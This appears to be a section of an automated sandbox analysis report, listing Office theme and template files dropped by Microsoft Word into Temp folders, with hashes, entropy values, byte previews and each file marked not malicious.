                                                Preview:PK...........G`.jaV....P......[Content_Types].xml...n.@...W......T@.mwM.E....)....y...H}.N..ll8.h5g6Q.=3_......?...x..e^Di.p.^.ud...(Y/..{w..r..9.../M...Q*{..E...(.4..>..y,.>..~&..b-.a.?..4Q2Q=.2.......m....>-....;]......N'..A...g.D.m.@(}..'.3Z....#....(+....-q<uq.+....?....1.....Y?Oy......O"..J?....Q$zT.].7.N..Q Wi.....<.........-..rY....hy.x[9.b.%-<.V?.(......;r.+...Q<.;U.....4...!'k...s.&..)'k...d.s..}R....o".D.I..7..7.KL.7..Z.....v..b.5.2].f....l.t....Z...Uk...j.&.U-....&>.ia1..9lhG..Q.P.'P.U}.k..rU..rU..rU..rU..rU..rU..rU..rU_EK_}.zi.....G.........j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..h.oT/-c..`....7FaBu.@-W.A.]..U}H.U}H.U}H.U}H.U}H.U}H.U}H.U}.-}...e...,..7...&(L.....>.kw...i...i...i...i...i...i...i.......I...U_.....vT.....}..\...v..W.!-W.!-W.!-W.!-W.!-W.!-W.!-W.U...7.....k.pT...0..O.... ...>..>..>..>..>..>..>......f..2V}....W>jO....5..].?.o..oPK...........G.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70.

                                                C:\Users\user\AppData\Local\Temp\TCDF568.tmp\content.inf

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):280
                                                Entropy (8bit):3.5301133500353727
                                                Encrypted:false
                                                SSDEEP:6:Q+sxnxUXp2pRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnyZ2vymD0wbnKNAH/lMz1
                                                MD5:1C5D58A5ED3B40486BC22B254D17D1DD
                                                SHA1:69B8BB7B0112B37B9B5F9ADA83D11FBC99FEC80A
                                                SHA-256:EBE031C340F04BB0235FE62C5A675CF65C5CC8CE908F4621A4F5D7EE85F83055
                                                SHA-512:4736E4F26C6FAAB47718945BA54BD841FE8EF61F0DBA927E5C4488593757DBF09689ABC387A8A44F7C74AA69BA89BEE8EA55C87999898FEFEB232B1BA8CC7086
                                                Malicious:false
                                                Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .G.a.l.l.e.r.y...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....

                                                C:\Users\user\AppData\Local\Temp\TCDF684.tmp\Circuit.thmx

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                Category:dropped
                                                Size (bytes):1463634
                                                Entropy (8bit):7.898382456989258
                                                Encrypted:false
                                                SSDEEP:24576:75MGNW/UpLkupMAqDJhNHK4/TuiKbdhbZM+byLH/:7ZwUpLkulkHK46iiDZHeLH/
                                                MD5:ACBA78931B156E4AF5C4EF9E4AB3003B
                                                SHA1:2A1F506749A046ECFB049F23EC43B429530EC489
                                                SHA-256:943E4044C40ABA93BD7EA31E8B5EBEBD7976085E8B1A89E905952FA8DAC7B878
                                                SHA-512:2815D912088BA049F468CA9D65B92F8951A9BE82AB194DBFACCF0E91F0202820F5BC9535966654D28F69A8B92D048808E95FEA93042D8C5DEA1DCB0D58BE5175
                                                Malicious:false
                                                Preview:PK.........{MB.f}......p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.v...(=.v........F_..U..G...T.e.y)[..b.......3.m....6.X5.P........_...b../..}.-......~.-..z..d.......j.^.+c..E.V..~3}..U.7..~p.>.E..9^d....4%}.E.$....N..r....<....%...%.?....w.u...h........D...w.....h........Dkw...x..T....T....T....T....T....T....j...."[.J.....;..!4...M...............t.n-.{..skp...[;.......F...j.7...4fC...K1..K/..K-..K+..K)..K'..f9......Fl._.........d0...?7K7].........A.......Fl.............Ft....u.......Ft........\.......w....R.......R.......R........o...].`.....A....#.`..\.....S.._...4...o.........W<x#..............w#...r.nD..]....\.~....|......b...^...Z...V...R...N..W<x......l._...l..?.A......xp_Q..y<h..tL.i.?HNn...]..........r.nD..]~.........wy~7......Ft...........E/|c.

                                                C:\Users\user\AppData\Local\Temp\TCDF684.tmp\content.inf

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):280
                                                Entropy (8bit):3.5286004619027067
                                                Encrypted:false
                                                SSDEEP:6:Q+sxnxUXOzXkRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxny6WymD0wbnKNAH/lMz1
                                                MD5:40FF521ED2BA1B015F17F0B0E5D95068
                                                SHA1:0F29C084311084B8FDFE67855884D8EB60BDE1A6
                                                SHA-256:CC3575BA195F0F271FFEBA6F6634BC9A2CF5F3BE448F58DBC002907D7C81CBBB
                                                SHA-512:9507E6145417AC730C284E58DC6B2063719400B395615C40D7885F78F57D55B251CB9C954D573CB8B6F073E4CEA82C0525AE90DEC68251C76A6F1B03FD9943C0
                                                Malicious:false
                                                Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .C.i.r.c.u.i.t...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....

                                                C:\Users\user\AppData\Local\Temp\TCDF770.tmp\Droplet.thmx

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:Microsoft OOXML
                                                Category:dropped
                                                Size (bytes):1750795
                                                Entropy (8bit):7.892395931401988
                                                Encrypted:false
                                                SSDEEP:24576:DyeAqDJpUDH3xk8ZKIBuX3TPtd36v4o5d4PISMETGBP6eUP+xSeW3v0HKPsc:uRqUjSTPtd36AFDM/BP6eUeW3v0Fc
                                                MD5:529795E0B55926752462CBF32C14E738
                                                SHA1:E72DFF8354DF2CB6A5698F14BBD1805D72FEEAFF
                                                SHA-256:8D341D1C24176DC6B67104C2AF90FABD3BFF666CCC0E269381703D7659A6FA05
                                                SHA-512:A51F440F1E19C084D905B721D0257F7EEE082B6377465CB94E677C29D4E844FD8021D0B6BA26C0907B72B84157C60A3EFEDFD96C16726F6ABEA8D896D78B08CE
                                                Malicious:false
                                                Preview:PK.........{MB.f}......p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.v...(=.v........F_..U..G...T.e.y)[..b.......3.m....6.X5.P........_...b../..}.-......~.-..z..d.......j.^.+c..E.V..~3}..U.7..~p.>.E..9^d....4%}.E.$....N..r....<....%...%.?....w.u...h........D...w.....h........Dkw...x..T....T....T....T....T....T....j...."[.J.....;..!4...M...............t.n-.{..skp...[;.......F...j.7...4fC...K1..K/..K-..K+..K)..K'..f9......Fl._.........d0...?7K7].........A.......Fl.............Ft....u.......Ft........\.......w....R.......R.......R........o...].`.....A....#.`..\.....S.._...4...o.........W<x#..............w#...r.nD..]....\.~....|......b...^...Z...V...R...N..W<x......l._...l..?.A......xp_Q..y<h..tL.i.?HNn...]..........r.nD..]~.........wy~7......Ft...........E/|c.

                                                C:\Users\user\AppData\Local\Temp\TCDF770.tmp\content.inf

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):280
                                                Entropy (8bit):3.528155916440219
                                                Encrypted:false
                                                SSDEEP:6:Q+sxnxUXcmlDuRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnyMmloymD0wbnKNAH/lMz1
                                                MD5:AA7B919B21FD42C457948DE1E2988CB3
                                                SHA1:19DA49CF5540E5840E95F4E722B54D44F3154E04
                                                SHA-256:5FFF5F1EC1686C138192317D5A67E22A6B02E5AAE89D73D4B19A492C2F5BE2F9
                                                SHA-512:01D27377942F69A0F2FE240DD73A1F97BB915E19D3D716EE4296C6EF8D8933C80E4E0C02F6C9FA72E531246713364190A2F67F43EDBE12826A1529BC2A629B00
                                                Malicious:false
                                                Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .D.r.o.p.l.e.t...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....

                                                C:\Users\user\AppData\Local\Temp\TCDF88C.tmp\Slate.thmx

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:Microsoft OOXML
                                                Category:dropped
                                                Size (bytes):2357051
                                                Entropy (8bit):7.929430745829162
                                                Encrypted:false
                                                SSDEEP:49152:tfVcGO3JiR6SgT7/bOCrKCsaFCX3CzwovQTSwW8nX:pVcG2iRedsaoXSzeOwWEX
                                                MD5:5BDE450A4BD9EFC71C370C731E6CDF43
                                                SHA1:5B223FB902D06F9FCC70C37217277D1E95C8F39D
                                                SHA-256:93BFC6AC1DC1CFF497DF92B30B42056C9D422B2321C21D65728B98E420D4ED50
                                                SHA-512:2365A9F76DA07D705A6053645FD2334D707967878F930061D451E571D9228C74A8016367525C37D09CB2AD82261B4B9E7CAEFBA0B96CE2374AC1FAC6B7AB5123
                                                Malicious:false
                                                Preview:PK.........{MB.f}......p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.v...(=.v........F_..U..G...T.e.y)[..b.......3.m....6.X5.P........_...b../..}.-......~.-..z..d.......j.^.+c..E.V..~3}..U.7..~p.>.E..9^d....4%}.E.$....N..r....<....%...%.?....w.u...h........D...w.....h........Dkw...x..T....T....T....T....T....T....j...."[.J.....;..!4...M...............t.n-.{..skp...[;.......F...j.7...4fC...K1..K/..K-..K+..K)..K'..f9......Fl._.........d0...?7K7].........A.......Fl.............Ft....u.......Ft........\.......w....R.......R.......R........o...].`.....A....#.`..\.....S.._...4...o.........W<x#..............w#...r.nD..]....\.~....|......b...^...Z...V...R...N..W<x......l._...l..?.A......xp_Q..y<h..tL.i.?HNn...]..........r.nD..]~.........wy~7......Ft...........E/|c.

                                                C:\Users\user\AppData\Local\Temp\TCDF88C.tmp\content.inf

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):276
                                                Entropy (8bit):3.516423078177173
                                                Encrypted:false
                                                SSDEEP:6:Q+sxnxUX7kARELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxny5ymD0wbnKNAH/lMz1
                                                MD5:5402138088A9CF0993C08A0CA81287B8
                                                SHA1:D734BD7F2FB2E0C7D5DB8F70B897376ECA935C9A
                                                SHA-256:5C9F5E03EEA4415043E65172AD2729F34BBBFC1A1156A630C65A71CE578EF137
                                                SHA-512:F40A8704F16AB1D5DCD861355B07C7CB555934BB9DA85AACDCF869DC942A9314FFA12231F9149D28D438BE6A1A14FCAB332E54B6679E29AD001B546A0F48DE64
                                                Malicious:false
                                                Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .S.l.a.t.e...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....

                                                C:\Users\user\AppData\Local\Temp\TCDF8DB.tmp\Damask.thmx

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:Microsoft OOXML
                                                Category:dropped
                                                Size (bytes):2218943
                                                Entropy (8bit):7.942378408801199
                                                Encrypted:false
                                                SSDEEP:49152:8mwK3gH/l4hM06Wqnnl1IdO9wASFntrPEWNe7:863gHt4hM9WWnMdO9w35PEWK
                                                MD5:EE33FDA08FBF10EF6450B875717F8887
                                                SHA1:7DFA77B8F4559115A6BF186EDE51727731D7107D
                                                SHA-256:5CF611069F281584DE3E63DE8B99253AA665867299DC0192E8274A32A82CAA20
                                                SHA-512:AED6E11003AAAACC3FB28AE838EDA521CB5411155063DFC391ACE2B9CBDFBD5476FAB2B5CC528485943EBBF537B95F026B7B5AB619893716F0A91AEFF076D885
                                                Malicious:false
                                                Preview:PK.........{MBS'..t...ip......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`.../.|u1..Y.....nK.......u=..2.tu~^L.Y5]/...~+.v...o....j.`?.S...../.by.|..>."kZbs....H.9..m.z.]W.V.?~v........;...N.......w....;.z..N.......w.....R.._..w._..w._..w._..w._..w._..w.n..Ofu.-..K.e........T..q.F...R[...~.u.....Z..F....7.?.v....5O....zot..i.....b...^...Z...V...R...N...r./.?........=....#.`..\~n.n...)J./.......7........+......Q..]n............w......Ft........|......b...^...Z...V...R...N..W<x......l._...l..?.A......x....x.9.|.8..............u................w#.....nD..]...........R.......R.......R........o...].`.....A....#.`..\.....+J./.......7........+......Q..]n.........w9~7......Ft........|......b...^.c..-...-...-

                                                C:\Users\user\AppData\Local\Temp\TCDF8DB.tmp\content.inf

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):278
                                                Entropy (8bit):3.544065206514744
                                                Encrypted:false
                                                SSDEEP:6:Q+sxnxUXCARELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnyy6ymD0wbnKNAH/lMz1
                                                MD5:06B3DDEFF905F75FA5FA5C5B70DCB938
                                                SHA1:E441B94F0621D593DC870A27B28AC6BE3842E7DB
                                                SHA-256:72D49BDDE44DAE251AEADF963C336F72FA870C969766A2BB343951E756B3C28A
                                                SHA-512:058792BAA633516037E7D833C8F59584BA5742E050FA918B1BEFC6F64A226AB3821B6347A729BEC2DF68BB2DFD2F8E27947F74CD4F6BDF842606B9DEDA0B75CC
                                                Malicious:false
                                                Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .D.a.m.a.s.k...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....

                                                C:\Users\user\AppData\Local\Temp\TCDF9A8.tmp\Mesh.thmx

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:Microsoft OOXML
                                                Category:dropped
                                                Size (bytes):3078052
                                                Entropy (8bit):7.954129852655753
                                                Encrypted:false
                                                SSDEEP:49152:bSEjlpY8skyFHuj2yY0ciM9U2NCVBB4YFzYFw7IaJE2VRK+Xn9DOOe9pp9N9Hu:bfp5sksA3cimUVxV05aJE2fKaDOXdN9O
                                                MD5:CDF98D6B111CF35576343B962EA5EEC6
                                                SHA1:D481A70EC9835B82BD6E54316BF27FAD05F13A1C
                                                SHA-256:E3F108DDB3B8581A7A2290DD1E220957E357A802ECA5B3087C95ED13AD93A734
                                                SHA-512:95C352869D08C0FE903B15311622003CB4635DE8F3A624C402C869F1715316BE2D8D9C0AB58548A84BBB32757E5A1F244B1014120543581FDEA7D7D9D502EF9C
                                                Malicious:false
                                                Preview:PK..........1AS'......ip......[Content_Types].xml..n.@.._......8ie'......}.......(y...H}......3Fi..%2.v?..3..._...d=..E.g.....7.i.-.t5.6......}}.m9r.......m...ML.g.M.eV$.r..*.M..l0...A...M..j;.w={o.f..F....i..v......5..d;..D.ySa...M&..qd*w>.O.{h...|w..5.]..'.CS<.:8C}.g.|E.../..>..].Tnml..I.......r.Gv.E....7.;.E......4/l.....6.K.C?1qz.O.v_..r......\c.c.>..lS........X.N.3N.sN..N.)'.%'..'..N.pL.E...T.!..CR....Ie..k.o..M..w.B.0}..3....v..+....,.q..pz.......v{.;....s3.|..V..ZZ......0.[.....x.....!.!~.8.e..n..&.}p....s.i.. ..[]...q.r....~..+.A\...q............e.-)h9..."Z.>...5-C..`..g.}........r.A.+..\...r.>.... .W.\...re?..%.-/hiA..ZR.r.W.D.\}.EK..kZ.>......5..9.&T......Wlu.b....}..+.A\...q......~.WK.Z^..........>.h..`......}.....^h....L...H...!...r.>... .W...\...rE?............-+hIA..\}..r...-}..i..`..G..j..).&T......Wlu.b....}..+.A\...q......~.WK.Z^..........>.h..`......}.....^j..K.L...H...!...r.>... .W...\...rE?............-+hIA..\}..r...-}..i.

                                                C:\Users\user\AppData\Local\Temp\TCDF9A8.tmp\content.inf

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):274
                                                Entropy (8bit):3.5303110391598502
                                                Encrypted:false
                                                SSDEEP:6:Q+sxnxUXzRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnylymD0wbnKNAH/lMz1
                                                MD5:8D1E1991838307E4C2197ECB5BA9FA79
                                                SHA1:4AD8BB98DC9C5060B58899B3E9DCBA6890BC9E93
                                                SHA-256:4ABA3D10F65D050A19A3C2F57A024DBA342D1E05706A8A3F66B6B8E16A980DB9
                                                SHA-512:DCDC9DB834303CC3EC8F1C94D950A104C504C588CE7631CE47E24268AABC18B1C23B6BEC3E2675E8A2A11C4D80EBF020324E0C7F985EA3A7BBC77C1101C23D01
                                                Malicious:false
                                                Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .M.e.s.h...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....

                                                C:\Users\user\AppData\Local\Temp\TCDFA76.tmp\Main_Event.thmx

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:Microsoft OOXML
                                                Category:dropped
                                                Size (bytes):2924237
                                                Entropy (8bit):7.970803022812704
                                                Encrypted:false
                                                SSDEEP:49152:mc4NEo4XNd5wU5qTkdC4+K9u5b/i40RKRAO/cLf68wy9yxKrOUURBgmai2prH:mJef5yTSoKMF//DRGJwLx9DBaH
                                                MD5:5AF1581E9E055B6E323129E4B07B1A45
                                                SHA1:B849F85BCAF0E1C58FA841FFAE3476D20D33F2DD
                                                SHA-256:BDC9FBF81FBE91F5BF286B2CEA00EE76E70752F7E51FE801146B79F9ADCB8E98
                                                SHA-512:11BFEF500DAEC099503E8CDB3B4DE4EDE205201C0985DB4CA5EBBA03471502D79D6616D9E8F471809F6F388D7CBB8B0D0799262CBE89FEB13998033E601CEE09
                                                Malicious:false
                                                Preview:PK.........{MB.$<.~....p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`..^.......H^..<}...lA-.D.....lI/...hD.Z....|VM..ze........L..tU...g....lQ....Y...>MI...5-....S......h=..u.h..?;h...@k...h...'Z...D...;.....h=..'Z...D...;.....)^./.../U.../..../U.../..../U..?...'.........Ngz..A.~.8.#D....xot.u.?...eyot.n..{..sk....[......Z..F....l...o)..o..o...oi..o)..o..,..b.s......2.C.z.~8.......f......x.9.|.8..............u................r.nD..]...........w.~7...-...-...-...-...-...-....x.&l........>.4.z.~8..........=E....As.1..q. 9....w.7...1........w.}7......Ft...................o)..o..o...oi..o)..o..w.7a...x0...........d0..............A.......Fl.............Ft................w#...r.nD..]..M...K1.0..7....

                                                C:\Users\user\AppData\Local\Temp\TCDFA76.tmp\content.inf

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):286
                                                Entropy (8bit):3.5434534344080606
                                                Encrypted:false
                                                SSDEEP:6:Q+sxnxUXIc5+RELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxny4KcymD0wbnKNAH/lMz1
                                                MD5:C9812793A4E94320C49C7CA054EE6AA4
                                                SHA1:CC1F88C8F3868B3A9DE7E0E5F928DBD015234ABA
                                                SHA-256:A535AE7DD5EDA6D31E1B5053E64D0D7600A7805C6C8F8AF1DB65451822848FFC
                                                SHA-512:D28AADEDE0473C5889F3B770E8D34B20570282B154CD9301932BF90BF6205CBBB96B51027DEC6788961BAF2776439ADBF9B56542C82D89280C0BEB600DF4B633
                                                Malicious:false
                                                Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .M.a.i.n._.E.v.e.n.t...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....

                                                C:\Users\user\AppData\Local\Temp\TCDFC0E.tmp\Vapor_Trail.thmx

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:Microsoft OOXML
                                                Category:dropped
                                                Size (bytes):3611324
                                                Entropy (8bit):7.965784120725206
                                                Encrypted:false
                                                SSDEEP:49152:ixc1kZBIabo4dTJyr3hJ50gd9OaFxTy+1Nn/M/noivF0po3M0h0Vsm:ixcaAabT83hJLdoaFxTygxcoiX3M0iCm
                                                MD5:FB88BFB743EEA98506536FC44B053BD0
                                                SHA1:B27A67A5EEC1B5F9E7A9C3B76223EDE4FCAF5537
                                                SHA-256:05057213BA7E5437AC3B8E9071A5577A8F04B1A67EFE25A08D3884249A22FBBF
                                                SHA-512:4270A19F4D73297EEC910B81FF17441F3FC7A6A2A84EBA2EA3F7388DD3AA0BA31E9E455CFF93D0A34F4EC7CA74672D407A1C4DC838A130E678CA92A2E085851C
                                                Malicious:false
                                                Preview:PK.........{MB.f}......p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.v...(=.v........F_..U..G...T.e.y)[..b.......3.m....6.X5.P........_...b../..}.-......~.-..z..d.......j.^.+c..E.V..~3}..U.7..~p.>.E..9^d....4%}.E.$....N..r....<....%...%.?....w.u...h........D...w.....h........Dkw...x..T....T....T....T....T....T....j...."[.J.....;..!4...M...............t.n-.{..skp...[;.......F...j.7...4fC...K1..K/..K-..K+..K)..K'..f9......Fl._.........d0...?7K7].........A.......Fl.............Ft....u.......Ft........\.......w....R.......R.......R........o...].`.....A....#.`..\.....S.._...4...o.........W<x#..............w#...r.nD..]....\.~....|......b...^...Z...V...R...N..W<x......l._...l..?.A......xp_Q..y<h..tL.i.?HNn...]..........r.nD..]~.........wy~7......Ft...........E/|c.

                                                C:\Users\user\AppData\Local\Temp\TCDFC0E.tmp\content.inf

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):288
                                                Entropy (8bit):3.5359188337181853
                                                Encrypted:false
                                                SSDEEP:6:Q+sxnxUXe46x8RELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnyO3UymD0wbnKNAH/lMz1
                                                MD5:0FEA64606C519B78B7A52639FEA11492
                                                SHA1:FC9A6D5185088318032FD212F6BDCBD1CF2FFE76
                                                SHA-256:60059C4DD87A74A2DC36748941CF5A421ED394368E0AA19ACA90D850FA6E4A13
                                                SHA-512:E04102E435B8297BF33086C0AD291AD36B5B4A97A59767F9CAC181D17CFB21D3CAA3235C7CD59BB301C58169C51C05DDDF2D637214384B9CC0324DAB0BB1EF8D
                                                Malicious:false
                                                Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .V.a.p.o.r._.T.r.a.i.l...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....

                                                C:\Users\user\AppData\Local\Temp\TCDFDB6.tmp\Content.inf

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:data
                                                Category:modified
                                                Size (bytes):274
                                                Entropy (8bit):3.4699940532942914
                                                Encrypted:false
                                                SSDEEP:6:fxnxUXGWWYlIWimoa2nRE3QepmlJ0+3FbnKfZObdADxp1RDWlVwv:fxny2WzIgN2RGHmD0wbnKYZAH+Vwv
                                                MD5:55BA5B2974A072B131249FD9FD42EB91
                                                SHA1:6509F8AC0AA23F9B8F3986217190F10206A691EA
                                                SHA-256:13FFAAFFC987BAAEF7833CD6A8994E504873290395DC2BD9B8E1D7E7E64199E7
                                                SHA-512:3DFB0B21D09B63AF69698252D073D51144B4E6D56C87B092F5D97CE07CBCF9C966828259C8D95944A7732549C554AE1FF363CB936CA50C889C364AA97501B558
                                                Malicious:false
                                                Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .I.n.s.i.g.h.t. .d.e.s.i.g.n. .s.e.t...d.o.t.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.W.D. .D.o.c.u.m.e.n.t. .P.a.r.t.s.}.........

                                                C:\Users\user\AppData\Local\Temp\TCDFDB6.tmp\Insight design set.dotx

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:Microsoft Word 2007+
                                                Category:dropped
                                                Size (bytes):3465076
                                                Entropy (8bit):7.898517227646252
                                                Encrypted:false
                                                SSDEEP:98304:n8ItVaN7vTMZ9IBbaETXbI8ItVaN7vTMZ9IBbaEiXbY:8ItwNX9BvTvItwNX9BvoM
                                                MD5:8BC84DB5A3B2F8AE2940D3FB19B43787
                                                SHA1:3A5FE7B14D020FAD0E25CD1DF67864E3E23254EE
                                                SHA-256:AF1FDEEA092169BF794CDC290BCA20AEA07AC7097D0EFCAB76F783FA38FDACDD
                                                SHA-512:558F52C2C79BF4A3FBB8BB7B1C671AFD70A2EC0B1BDE10AC0FED6F5398E53ED3B2087B38B7A4A3D209E4F1B34150506E1BA362E4E1620A47ED9A1C7924BB9995
                                                Malicious:false
